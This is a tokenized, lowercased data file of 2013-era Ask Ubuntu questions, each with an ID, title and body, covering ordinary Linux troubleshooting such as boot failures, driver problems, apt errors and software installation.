2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) enter current password for root ( enter for none ) : error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) enter current password for root ( enter for none ) :
337936	how to install windows 7/8 inside ubuntu ?	i 'm using ubuntu 12.04 lts , and i have a laptop with good configuration . i would like to install windows 8/7 inside my ubuntu os . is it possible ? if yes , what is the process ? can i install it from dvd ?
337942	is there any library similar to < conio.h > ?	i used the ide dev c++ to compile c programs on windows and i used the libraries and , but now i use ubuntu and downloaded the codeblocks , but it does not have these libraries . i just wanted to use some function similar to getch ( ) , which is present in the library conio . is there any similar library ? and if there is how do i install ?
337948	purple screen boot 12.04 ( black with recovery mode )	so i have a problem with my asus computer : everything went just fine until today , my computer shows me the grub menu when i start up like it usually does . but when i choose a version of linux the only thing i get is a purple screen or a black one if i use the recovery mode . i have been using ubuntu 12.04 for about a month and i did not download a single update the day before it started to act like this . it was also running perfectly fine on start up until today . i tried to replace quiet splash with nomodeset but that did n't help , running an older version of linux did n't help either , as i have the same problem on every version . i have an asus motherboard 8 gb ddr3 ram nvidia gtx 560 graphics card intel i7 quad core processor ( someone posted a similar question here : ubuntu 12.04.2 lts boots to purple screen but nobody answered : / ) edit boot repair did n't solve the problem , here is the link it gave me : http : //paste.ubuntu.com/6033493/ second edit : ctrl alt delete who worked before the boot repair does n't work anymore ... : / ( i could use it when i had the purple/black screen ) 3th edit : the grub commandline works , so maybe it 's a problem with graphics ? ( even though i did n't change anything when i last used my laptop on ubuntu.. ) last edit : seems like this was marked as a duplicate , the answers provided did n't solve the problem at all.. as i could n't find the source of the problem i reinstalled ubuntu ... ( wich completely crashed my computer , due to a fatal error while trying to install the grub , it could n't find the device.. but that 's not part of the question anymore : ) . ) but thanks for your fast answers ! : )
337949	i have added external lan card of intel pro/1000gt but thats not showing in ubuntu	i am running ubuntu 12.04 based distro ( elementary os stable ) . my motherboard is an : asus p5kpl-am se , and the lan card is : intel pro 1000/gt desktop adapter . i am trying to add an external lan card so that i can connect on lan and internet both at the same time . after connecting the lan card in the pci slot , i do not find the card in the system . the output of the ifconfig -a command is : root @ host : /home/user # ifconfig -a eth0 link encap : ethernet hwaddr 90 : e6 : ba : b8:7a : be inet addr:192.168.1.10 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :92e6 : baff : feb8:7abe/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:38497 errors:0 dropped:0 overruns:0 frame:0 tx packets:35509 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:33402284 ( 33.4 mb ) tx bytes:20030855 ( 20.0 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1343 errors:0 dropped:0 overruns:0 frame:0 tx packets:1343 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:125398 ( 125.3 kb ) tx bytes:125398 ( 125.3 kb then i ran the lspci command and the output is : root @ host : /home/user # lspci 00:00.0 host bridge : intel corporation 82g33/g31/p35/p31 express dram controller ( rev 10 ) 00:02.0 vga compatible controller : intel corporation 82g33/g31 express integrated graphics controller ( rev 10 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 01 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 01 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gb/gr ( ich7 family ) lpc interface bridge ( rev 01 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 01 ) 00:1f.2 ide interface : intel corporation nm10/ich7 family sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 01 ) 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 )
337952	where i can get a tablet with ubuntu , or i could use ubuntu on any tablet that meets requirement ?	i 'm just wondering does ubuntu sell the tablets or can i buy one with the right requirements and put ubuntu on to it as the new operating system ? ?
337953	sudo apt-get update error	hello i was trying to update my apt-get . and its giving me this error err http : //bd.archive.ubuntu.com raring release.gpg could not connect to bd.archive.ubuntu.com:80 ( 116.193.170.18 ) , connection timed out err http : //bd.archive.ubuntu.com raring-updates release.gpg unable to connect to bd.archive.ubuntu.com : http : err http : //bd.archive.ubuntu.com raring-backports release.gpg unable to connect to bd.archive.ubuntu.com : http : reading package lists ... done w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/raring/release.gpg could not connect to bd.archive.ubuntu.com:80 ( 116.193.170.18 ) , connection timed out w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/raring-updates/release.gpg unable to connect to bd.archive.ubuntu.com : http : w : failed to fetch http : //bd.archive.ubuntu.com/ubuntu/dists/raring-backports/release.gpg unable to connect to bd.archive.ubuntu.com : http : w : some index files failed to download . they have been ignored , or old ones used instead . i am not a ubuntu master but i can understand this is not a computer error . any guess how to fix this ?
337955	ubuntu 12.04 lts freezes entirely . what should i do ?	sometimes ( like 10 times a day ) my ubuntu completely freezes ( mouse stop working , the sound who whas playing start a annoying loop `` repeating like the last 0.2 seconds '' ) and the only thing im able to do is mannualy restart via the reset button on cpu case . what should i do ? is there some system log where i can find the reason ? thx and sorry my bad english
337956	anyone know any link handouts or free books that talk about advanced linux ?	i am new to ubuntu and even i already understand quite a few basic commands in shell . i wanted to learn more advanced content on shell script and also on ubuntu , so i 'm looking for books and handouts . so can someone help me ?
337957	i shred files under / , and now i get kernel panic , what can i do ?	i accidentally deleted all files under / , my system does n't start anymore . folders and links still there , nothing seems to be lost . but `` kernel panic not syncing unable to mount root fs '' after grub tried to start the system . fully encrypted xubuntu 12.04 system , encryption alright , accessible using rescue . tried several things with rescue and installed a new system on other partition to copy deleted files manually . but no additional files there . maybe files which only occur on an encrypted system ? i need a way to repair my system ( missing files ? ) and a way to boot it again , since i had to install grub in the mbr for the system on the other partition ( did n't work another way , installation/rescue/ubuntu became ridiculous ) .
337958	flash video appears malformed . how do i fix this ?	i wiped my computer a while ago and i re installed a new version of ubuntu , i believe i was on 11.10 now 12.04 . downloaded the flash player as usual from the software center . this is what i get when i try to go to a youtube video ( the size of the screen cap is how large the video should be . ) when i encountered this , i looked through and found the extra flash add on that firefox said it needed being gnash swf viewer , that was a waist , no change . downloaded chromium , same thing happened . re-installed the flash player , nothing . i 'm stumped frankly , ca n't find anything around with an answer for this so far , maybe i 'm looking for it in a wrong way ?
337959	installing ubuntu 13.04 as only os but windows still there ( asus ux32a ) ?	i 'm trying to install ubuntu 13.04 as my only os but something goes wrong ( i 'm not so good at this ) . i have secure boot disabled , csm boot enabled , and can not find where to disable intel smart response technology . should i choose to put ubuntu on the small ssd or on the lager disc ? anyway , in the installation , i chose to install ubuntu as my only os on the small ssd . the installation was successful , or so it said , but when i restarted my computer , there was windows 8 . i can access ubuntu via advanced restart from windows or if i choose to `` boot from ubuntu '' . i get the grubmenu . any suggestions ?
337964	list all files that do not have extensions	i want to list all files in a directory that do n't have extensions . for example : $ ls a.txt b c.pdf d e.png $ ls -someoption b d what command i can use instead of ls -someoption ?
337969	what are click packages ?	i noticed that ubuntu sdk recently had some updates and it installed a program named `` click '' . i would like to know what they are and how to use them . also , would they make debian packaging easier ?
337970	why is the back arrow on nautilus so small ?	i 've noticed that the back arrow next to the folder path is really small . is there anyway to fix this ? it 's really annoying . it looks like this :
337974	broadcom sta driver fails to install missing wl on ubuntu 12.04.3 lts / linux 3.8	after installing ubuntu 12.04 lts on my hp folio 13 i can not get wireless to work . my kernel is 3.8.0-29-generic and my wireless module is a broadcom bcm4313 . after running rfkill list all : 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no the wired connection works fine . the driver activation for broadcom sta wireless driver fails every time . in the log it says fatal : module wl not found . fatal : error running install command for wl after running lspci -nnk | grep -iea3 `` ( wireless|network|wlan ) '' : 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) subsystem : hewlett-packard company device [ 103c:1795 ] kernel modules : bcma 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader [ 10ec:5209 ] ( rev 01 ) i have also tried this method and it did not work : how to install broadcom wireless drivers .
337976	installing grunt js on 13.04	how does one install grunt on ubuntu 13.04 ? i 've attempted to install it via npm : sudo npm install -g grunt then when i run grunt : grunt but it does n't seem to work it throws an error : path.js:313 throw new typeerror ( 'arguments to path.resolve must be strings ' ) ; ^ typeerror : arguments to path.resolve must be strings at object.exports.resolve ( path.js:313:15 ) at object. < anonymous > ( /usr/local/lib/node_modules/grunt/bin/grunt:13:16 ) at module._compile ( module.js:456:26 ) at object.module._extensions..js ( module.js:474:10 ) at module.load ( module.js:356:32 ) at function.module._load ( module.js:312:12 ) at function.module.runmain ( module.js:497:10 ) at startup ( node.js:119:16 ) at node.js:901:3 here 's some information about what version of node i have : $ npm -v 1.3.8
337985	no audio from bt878 tv capture card	i have a hauppauge wintv capture card . the card is recognised by my system and i managed to get the video part to work , but not the audio part . this is the output of lspci : 04:01.0 multimedia video controller : brooktree corporation bt878 video capture ( rev 11 ) 04:01.1 multimedia controller : brooktree corporation bt878 audio capture ( rev 11 ) this is the output of lspce -vnn : 04:01.0 multimedia video controller [ 0400 ] : brooktree corporation bt878 video capture [ 109e:036e ] ( rev 11 ) subsystem : hauppauge computer works inc. wintv series [ 0070:13eb ] flags : bus master , medium devsel , latency 32 , irq 17 memory at d0101000 ( 32-bit , prefetchable ) [ size=4k ] capabilities : < access denied > kernel driver in use : bttv kernel modules : bttv 04:01.1 multimedia controller [ 0480 ] : brooktree corporation bt878 audio capture [ 109e:0878 ] ( rev 11 ) subsystem : hauppauge computer works inc. wintv series [ 0070:13eb ] flags : bus master , medium devsel , latency 32 , irq 17 memory at d0100000 ( 32-bit , prefetchable ) [ size=4k ] capabilities : < access denied > kernel driver in use : snd_bt87x kernel modules : snd-bt87x the output of dmesg | grep bt is : [ 20.028882 ] bttv : driver version 0.9.19 loaded [ 20.028885 ] bttv : using 8 buffers with 2080k ( 520 pages ) each for capture [ 20.028909 ] bttv : bt8xx card found ( 0 ) [ 20.028921 ] bttv 0000:04:01.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 20.028932 ] bttv : 0 : bt878 ( rev 17 ) at 0000:04:01.0 , irq : 17 , latency : 32 , mmio : 0xd0101000 [ 20.028945 ] bttv : 0 : detected : hauppauge wintv [ card=10 ] , pci subsystem id is 0070:13eb [ 20.028947 ] bttv : 0 : using : hauppauge ( bt878 ) [ card=10 , autodetected ] [ 20.031481 ] bttv : 0 : hauppauge/voodoo msp34xx : reset line init [ 5 ] [ 20.075503 ] bttv : 0 : hauppauge eeprom indicates model # 44809 [ 20.075504 ] bttv : 0 : tuner type=38 [ 20.349017 ] bttv : 0 : audio absent , no audio device found ! [ 20.649700 ] bttv : 0 : registered device video0 [ 20.649734 ] bttv : 0 : registered device vbi0 [ 20.649771 ] bttv : 0 : setting pll : 28636363 = > 35468950 ( needs up to 100ms ) [ 20.679506 ] bttv : pll set ok [ 20.686389 ] snd_bt87x 0000:04:01.1 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 20.686485 ] bt87x0 : using board 1 , analog , digital ( rate 32000 hz ) update : i suspect the problem is with the module snd_bt87x ( which attempts to get the captured audio directly through the pci bus instead of using the patch cable connected to the audio input on the main audio card ) . i tried the kernel 3.11.0 ( latest as of 28.08.2013 ) , which did n't load snd_bt87x and i managed to get the audio from my main audio card using patch audio cable from the tv card connected to the line-in input . this situation is still not ideal because i can not use the line-in input for any other purpose , but it is already better than not having tv audio captured at all . any help to allow me to get the audio through the pci bus , or to get it to work with the stock kernel will be appreciated . this is the new output of `` dsmeg | grep bt '' now with the new kernel : [ 19.698237 ] bt87x0 : using board 1 , analog , digital ( rate 32000 hz ) [ 19.765551 ] bttv : driver version 0.9.19 loaded [ 19.765563 ] bttv : using 8 buffers with 2080k ( 520 pages ) each for capture [ 19.765600 ] bttv : bt8xx card found ( 0 ) [ 19.765660 ] bttv : 0 : bt878 ( rev 17 ) at 0000:04:01.0 , irq : 17 , latency : 32 , mmio : 0xd0101000 [ 19.765671 ] bttv : 0 : detected : hauppauge wintv [ card=10 ] , pci subsystem id is 0070:13eb [ 19.765672 ] bttv : 0 : using : hauppauge ( bt878 ) [ card=10 , autodetected ] [ 19.768221 ] bttv : 0 : hauppauge/voodoo msp34xx : reset line init [ 5 ] [ 19.812411 ] bttv : 0 : hauppauge eeprom indicates model # 44809 [ 19.812412 ] bttv : 0 : tuner type=38 [ 20.049860 ] bttv : 0 : audio absent , no audio device found ! [ 20.333205 ] bttv : 0 : setting pll : 28636363 = > 35468950 ( needs up to 100ms ) [ 20.362779 ] bttv : pll set ok [ 20.365636 ] bttv : 0 : registered device video0 [ 20.365691 ] bttv : 0 : registered device vbi0
337987	checking my juju instance through amazon 's aws console ?	i 'm pretty new to juju and i recently followed a few tutorials on how to deploy wordpress ( https : //juju.ubuntu.com/docs/getting-started.html ) and a sample ruby on rails application onto my amazon aws . everything seems to work ; when i run juju status , i can get the dns of my running application and go to it ; everything seems to work fine . but i ca n't find where i can check on the status or anything of my application through the amazon management console . please help ? thanks !
337991	ca n't boot anymore , get a message on ubuntu purple screen	a friend has a compaq laptop with a broken screen , so he use an external screen with hdmi and use ubuntu 12.04 lts . but after a while after he started the computer , the screen finally show up with the purple boot screen . but he got this message keeping scrolling : running /scripts/local-premount ... done mounting root file system ... begin : running /scripts/local-top ... done and after a bit , there 's an another line with it : loading essential drivers ... done but he keep scrolling and do n't go ahead . can you help us ?
337996	i want to uninstall ubuntu 12.04 lts completely and install windows 8	i want to uninstall ubuntu 12.04 lts and install windows 8 pro . i have the windows disc but an unsure if there is anything special that i need to do first . any help will be greatly appreciated .
337998	making flash drive as a boot option	this is my issue . i just got a brand new laptop ( windows 8 samsung ) . this does not have a cd drive and i wanted to do a dual boot with windows and ubuntu . i did a `` install from flash drive approach '' and i choose `` install alongside windows 8 '' option . it got installed successfully but the ubuntu was very laggy and slow . since i like ubuntu much i decided to erase my windows completely and install ubuntu as the only os which now i am unable to . because for some reason my flash drive does not appear in the list of boot options it says something like '' option 1 : windows xxxxx '' '' option 2 ubuntu 12029mb etc '' but when i choose ubuntu it takes me to the grub screen back and i am unable to reinstall ubuntu . is there some way i can make this bootable flash drive to come back again as one of the bootable options so that i can wipe everything and keep ubuntu as the only os ?
338004	while ubuntu is suspended , my computer continues to run and use excessive battery power	i understand that suspend uses battery power to keep the information on the ram , but i suspend ubuntu and later when i get my computer out of my bag , it is very hot . it is as if the hard drive and fans continue to run . does anyone have a solution ? ? thanks .
338010	`` no xs-ruby-versions '' error message when building ruby package	i am trying to build a ruby package using git-buildpackage . i am getting this error near the end of the process : dh clean -- buildsystem=ruby -- with ruby dh_testdir -o -- buildsystem=ruby dh_auto_clean -o -- buildsystem=ruby /usr/lib/ruby/vendor_ruby/gem2deb.rb:17 : warning : setting encoding.default_external entering dh_ruby -- clean no xs-ruby-versions : field found in source ! dh_auto_clean : dh_ruby -- clean returned exit code 1 make : *** [ clean ] error 1 dpkg-buildpackage : error : fakeroot debian/rules clean gave error exit status 2 e : failed autobuilding of package i : unmounting dev/pts filesystem i : unmounting proc filesystem - > cleaning cow directory forking : rm -rf /var/cache/pbuilder/build//cow.7268 gbp : error : could n't run 'git-pbuilder ' : git-pbuilder returned 1 here is the rules file : # ! /usr/bin/make -f package = $ ( shell dh_listpackages ) version = $ ( shell dpkg-parsechangelog | grep ^version : | cut -d ' ' -f2 \ | cut -d- -f1 ) tmp : = debian/ $ ( package ) dh_verbose=1 % : dh $ @ -- buildsystem=ruby -- with ruby override_dh_auto_install : rsync -c -- recursive -- links -- perms -- times -v \ -- exclude-from=debian/exclude.rsync -- exclude debian $ ( curdir ) / debian/ $ ( package )
338015	wine and nvidia optimus problem	i have asus n53sn computer which has nvidia optimus . rift online is working on my ubuntu but its using intel card . i need to make it work with geforce . but optirun wine riftpatcher.exe saying to me ; wine : can not find l '' c : \windows\system32\riftpatchlive.exe '' so how can i make it work with geforce ? and one more thing since rift has launcher and client separately , is geforce going to work with client too ? im new to ubuntu .. thanks
338017	scid chess program compiling issue	first of all i would like to point that i 'm new to ubuntu so sorry if what i am asking is ridiculous . i have downloaded scid 4.4 chess program and i have tried to compile it as it was explained on its website : 1 ) initialize git . 2 ) create a folder where you want to download and ( ? ) compile the source , then cast : git init on your command line . 3 ) you 're now ready to download the sources recall fulvio 's spell : git clone git : //scid.git.sourceforge.net/gitroot/scid/scid this should get you the latest scid source . 4 ) you 're now ready to compile scid . in principle , all you need to do is : ./configure and then make 5 ) if you get stuck , you probably need to get developer versions of tcl/tk . this translates into issuing these three commands : sudo apt-get install tcl8.5-dev sudo apt-get install tk8.5-dev sudo apt-get install zlib1g -dev 6 ) you should now be ready to compile the problem is that when i run ./configure to start compiling the following message appears on terminal : configure : makefile configuration program for scid tcl/tk version : 8.5 your operating system is : linux 3.8.0-19-generic location of `` tcl.h '' : /usr/include/tcl8.5 location of `` tk.h '' : /usr/include/tcl8.5 location of tcl 8.5 library : not found location of tk 8.5 library : not found checking if your system already has zlib installed : yes . using makefile.conf . not all settings could be determined ! the default makefile was written . you will need to edit it before you can compile scid . what should i do ? has anybody faced this problem before ? thanks in advance i have run ls -l /usr/include/tcl8.5/tcl.h here 's the result : -rw-r -- r -- 1 root root 87291 abr 22 10:45 /usr/include/tcl8.5/tcl.h i have also tried what you suggested could you run git reset -- hard head and git clean -d -f to clean up everything using git ? then run ./configure again . just a shot in the dark - i 've seen some gnu automake stuff still listening to its `` cached '' version of the results or something . still no solution . i do n't know why it ca n't recognize the library though it is installed i opened configure to see where the program looked for the library . this is the code : # librarypath : list of possible locations of tcl/tk library . set librarypath { /usr/lib /usr/lib64 /usr/local/tcl/lib /usr/local/lib /usr/x11r6/lib /opt/tcltk/lib /usr/lib/x86_64-linux-gnu } lappend librarypath `` /usr/lib/tcl $ { tclv } '' lappend librarypath `` /usr/lib/tk $ { tclv } '' lappend librarypath `` /usr/lib/tcl $ { tclv_nodot } '' lappend librarypath `` /usr/lib/tk $ { tclv_nodot } '' # try to add tcl_library and auto_path values to librarypath , # in case the user has a non-standard tcl/tk library location : if { [ info exists : :tcl_library ] } { lappend headerpath \ [ file join [ file dirname [ file dirname $ : :tcl_library ] ] include ] lappend librarypath [ file dirname $ : :tcl_library ] lappend librarypath $ : :tcl_library } if { [ info exists : :auto_path ] } { foreach name $ : :auto_path { lappend librarypath $ name } } if { ! [ info exists var ( tcl_include ) ] } { puts -nonewline { location of `` tcl.h '' : } set opt ( tcl_h ) [ finddir `` tcl.h '' $ headerpath `` tcl_version . * $ tclv '' ] if { $ opt ( tcl_h ) == `` '' } { puts `` not found '' set success 0 set opt ( tcl_h ) `` $ : :defaultvar ( tcl_include ) '' } else { puts $ opt ( tcl_h ) } } set opt ( tcl_lib ) `` '' if { ! [ info exists var ( tcl_library ) ] } { puts -nonewline `` location of tcl $ tclv library : `` set opt ( tcl_lib ) [ finddir `` libtcl $ { tclv } . * '' $ librarypath ] if { $ opt ( tcl_lib ) == `` '' } { set opt ( tcl_lib ) [ finddir `` libtcl $ { tclv_nodot } . * '' $ librarypath ] if { $ opt ( tcl_lib ) == `` '' } { puts `` not found '' set success 0 set opt ( tcl_lib ) `` $ opt ( tcl_h ) '' set opt ( tcl_lib_file ) `` tcl\ $ ( tcl_version ) '' } else { set opt ( tcl_lib_file ) `` tcl $ { tclv_nodot } '' puts $ opt ( tcl_lib ) } } else { set opt ( tcl_lib_file ) `` tcl\ $ ( tcl_version ) '' puts $ opt ( tcl_lib ) } } if { ! [ info exists var ( tcl_include ) ] } { set var ( tcl_include ) `` -i $ opt ( tcl_h ) '' } if { ! [ info exists var ( tcl_library ) ] } { set var ( tcl_library ) `` -l $ opt ( tcl_lib ) -l $ opt ( tcl_lib_file ) '' } return $ success so i guess ( and by guess i mean i have no idea how to code ) i should write somewhere in here usr/lib/tcl8.5 and usr/lib/tk8.5 , am i right ?
338022	android sdk manager error	i keep geting this error when i run the update manager . can anyone help me debug this ? stopping adb server failed ( code -1 ) . unable to run 'adb ' : can not run program `` /home/lightning0/android/adt-bundle-linux-x86_64-20130729/sdk/platform-tools/adb '' : error=2 , no such file or directory . starting adb server failed ( code -1 ) . ls -l /home/lightning0/android/adt-bundle-linux-x86_64-20130729/sdk/platform-tools/ad‌‌​​b : no such file or directory
338023	where 's the tools menu and menu bar ?	i just installed ubuntu 13.0.4 alongside win7 on my machine and i am a rank beginner with ubuntu ( first day , literally ) . i can not find the tools menu anywhere . i have no menu bar . i have been looking for tips online and reading some documentation , but still no luck . advice ?
338030	was never asked to set a password , ca n't download software without one ?	i installed chrubuntu on my arm chromebook . i need to download from the ubuntu software center . whenever i try to download something , it asks for authentication by a password , but i have never set one or was ever asked to set one . is there a default password or is something weird going on with this ? i 've tried spacebar , blank , `` chronos '' , `` user ''
338044	failed to resolve repositories when running apt-get	i 've been looking at this for days along the forums , and no one seems to have a satisfactory answer . i 'm running raring , completely default . i repeatedly see `` something wicked happened resolving ... '' messages for several repositories , including the default ubuntu us archive . when installing steam through the software center , it adds the repository for steam specific packages ( repo.steampowered.com ) . when installing chrome , it also installs a new repository . when i force ubuntu to use an outside resolver ( both on the internal network , as well as the public 4.2.2.2 ) , the error is solved when trying to pull packages from the ubuntu repositories , but i still get the error for outside repositories . however , i can easily resolve these domains using any of the resolvers : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/raring/release.gpg something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -11 - system error ) w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/stable/release.gpg something wicked happened resolving 'dl.google.com : http ' ( -11 - system error ) w : failed to fetch http : //repo.steampowered.com/steam/dists/precise/release.gpg something wicked happened resolving 'repo.steampowered.com : http ' ( -11 - system error ) $ nslookup repo.steampowered.com server : 127.0.1.1 address : 127.0.1.1 # 53 non-authoritative answer : name : repo.steampowered.com address : 208.64.203.149 $ nslookup repo.steampowered.com 4.2.2.2 server : 4.2.2.2 address : 4.2.2.2 # 53 non-authoritative answer : name : repo.steampowered.com address : 208.64.203.149
338051	how to print a file in ubuntu terminal using cat that spaces in its name	suppose my file name is äbc def when i type in the terminal like cat ¨abc def¨ it shows error . can anybody tell me how to print this file that has spaces in between the name .
338052	how to make google chrome work after a host name change	this is the error message i get when i try and launch google chrome : the profile appears to be in use by process 2137 on host brandon pc . if you are sure no other processes are using this profile , delete the file /home/brandon/.config/google-chrome/singletonlock and relaunch google chrome . how do i fix this ?
338061	wine : vboxvideo_dri.so : wrong elf class	i 'm trying to run a game under wine . i want to confirm if it works under linux . i 'm running ubuntu quantal under virtualbox ( the host os is windows 7 ) . the guest additions are successfully installed : $ lsmod | grep vbox vboxvideo 12612 1 drm 288972 2 vboxvideo vboxsf 43770 0 vboxguest 235494 7 vboxsf here 's what wine says : $ libgl_debug=verbose wine nhc.exe libgl : screen 0 does not appear to be dri2 capable libgl : xf86drigetclientdrivername : 1.0.0 vboxvideo ( screen 0 ) libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/tls/vboxvideo_dri.so libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/vboxvideo_dri.so libgl error : dlopen /usr/lib/i386-linux-gnu/dri/vboxvideo_dri.so failed ( /usr/lib/i386-linux-gnu/dri/vboxvideo_dri.so : wrong elf class : elfclass64 ) libgl : opendriver : trying $ { origin } /dri/tls/vboxvideo_dri.so libgl : opendriver : trying $ { origin } /dri/vboxvideo_dri.so libgl error : dlopen $ { origin } /dri/vboxvideo_dri.so failed ( $ { origin } /dri/vboxvideo_dri.so : can not open shared object file : no such file or directory ) libgl : opendriver : trying /usr/lib/dri/tls/vboxvideo_dri.so libgl : opendriver : trying /usr/lib/dri/vboxvideo_dri.so libgl error : dlopen /usr/lib/dri/vboxvideo_dri.so failed ( /usr/lib/dri/vboxvideo_dri.so : can not open shared object file : no such file or directory ) libgl error : unable to load driver : vboxvideo_dri.so libgl error : failed to load driver : vboxvideo libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/i386-linux-gnu/dri/swrast_dri.so libgl : ca n't open configuration file /etc/drirc : no such file or directory . libgl : ca n't open configuration file /home/yuri/.drirc : no such file or directory . libgl : ca n't open configuration file /etc/drirc : no such file or directory . libgl : ca n't open configuration file /home/yuri/.drirc : no such file or directory . fixme : d3d_caps : wined3d_guess_card no card selector available for gl vendor 0x4 and card vendor 0000 ( using gl_renderer `` gallium 0.4 on llvmpipe ( llvm 0x301 ) '' ) . wine : unhandled page fault on read access to 0xffffffff at address 0x75948050 ( thread 0009 ) , starting debugger ... is there a way to remedy it ?
338084	can i download ubuntu 12.04 on a notebook/laptop ?	i am downloading ubuntu 12.04.3-desktop . is this the correct file to use for notebook computers ? if yes , why not label it as such ? if no , what version should i use for my notebook ?
338093	dell r910 not recognizing all physical cores 12.04lts 64 bit desktop	i have installed ubuntu 12.04lts 64 bit desktop on a dell r910 which has four 8 core cpu 's intel速 xeon速 x7560 2.26ghz , 24m cache , 6.40 gt/s qpi , turbo , ht , 8c and 256gb of main memory when i view system settings it only indicates that there are intel xeon ( r ) x7560 @ 2.27ghz x 20 there are actually 32 physical cores present the bios shows four 8 core cpus during bootup how can i get the os to use all 32 physical cores ?
338095	new user - installing applications ie android sdk - where to ? ( equivalent of program files ? )	it is taking me some time to find my way around ubuntu and while i know i can sudo an app like pcmanfm to create directories i do not know where the best place to create a folder for the android sdk ( http : //developer.android.com/sdk/installing/index.html ) which is a zip file . to create from the root i have to sudo then chown ( although i do not know the right group ) which seems a long way round ... . so in summary where is ubuntus equivalent 'program files ' folder where as a user i have full control with out going sudo each time ? if there is not one advice would be welcome . thanks t
338098	ubuntu 13.04 - sound problems	i 'm having the weirdest sound problems ever . i could n't define a pattern yet . but if i open youtube just after pc booted i 'll have sound , but after a few minutes of inactivity i loose sound on my pc . i 've tried this : https : //wiki.ubuntu.com/audio/installinglinuxalsadrivermodules - but linux-alsa-driver-modules-3.8.0-29-generic is not found . http : //itsfoss.com/fix-sound-ubuntu-1304-quick-tip/ some info : lspci -vk | egrep -ia13 `` vga|audio '' - http : //pastebin.com/67bub6yw aplay -l - http : //pastebin.com/47dqbzwe aplay -l - http : //pastebin.com/edwwlgt1 speaker-test -c 2 -r 48000 -d hw:1,3 - http : //pastebin.com/1gm8g9uz
338100	forwarding traffic between 2 interfaces	i have 2 vlans connected to a 'router ' . all the machines can ping other machines within their own vlan and the router . the router can ping all of the machines . i am trying to get machines to talk to other vlan via the router . on the router , the vlans are on eth1 and eth2 . i have added the following iptable rules : -a forward -i eth1 -o eth2 -j accept -a forward -i eth2 -o eth1 -j accept on machines within the vlans i added the following route entry : route add -net 172.16.0.0 netmask 255.255.255.0 gw 172.16.30.1 where 172.16.0.x is the ip address range in the other vlan and 172.16.30.1 is the router 's ip . what did i do wrong ? what did i not do ?
338106	graphics card .. which vendor has better compatibilty ?	i plan to switch from windows to ubuntu in the next few weeks . i currently have a radeon hd6970 in my system , that i 'll be changing during this process too ( since it is loud and i ca n't make much use of it under ubuntu , considering that many of the more demanding games i play are n't available anyways ) . thus i 'm looking for a card that is both passively cooled ( so it 'll be silent ) and that will play nicely with ubuntu . it seems that currently the `` fastest '' passive/fanless cards are the nvidia geforce gt 640 and the amd/ati radeon hd7750 . both have similar prices ( around âź100 ) . originally i was going to opt for the nvidia one , considering how everyone seems to claim that nvidia has the better drivers , plus , with my multi-monitor setup the driver in the live cd ( 12.04 ) for the hd6970 seems to be crashing when i change the display setting ( this is probably fixable , but i have n't really had much reason to really look into it ) . but then i read around here and on other pages that while nvidia has the better ( as in better-performing ; closed-source ) drivers , amd has better ( as in better compatibility ; open-source ) drivers that are updated/patched more often . so i 'm not really sure which one to pick . while i do n't really care about the performance difference , i also ca n't really verify the better compatibility of the amd cards . i 've always had amd/ati cards up to now , and tried ubuntu on/off a few times .. and the graphics cards have always been a hairy detail ( especially since i have a 2-monitor setup ) any suggestions/ideas on which i should pick ? or is it even worth trying both cards ? like i said , the deciding factor here is which one will cause me less headaches . ( since performance-wise both cards are probably fine . )
338107	how to mount floppy drive in ubuntu 13.04 ?	it was originally working , then i unlocked the floppy disk icon from the launcher . now i need to access the floppy and i can not figure out how to restore the floppy drive icon to the sidebar . is there any procedure to restore access to my floppy drive ?
338113	ca n't boot , stuck on grub rescue with no modules ?	i tried installing ubuntu 12.04 on my new computer ( i have already installed it on my old computer , and everything is fine ) . for some reason , grub said it was not installed . upon reboot , i reach the grub rescue screen with no bootable device . i tried using normal.mod , but i have no modules . i ca n't access my bios , and i basically can not even boot to reinstall . i have no idea what to do .
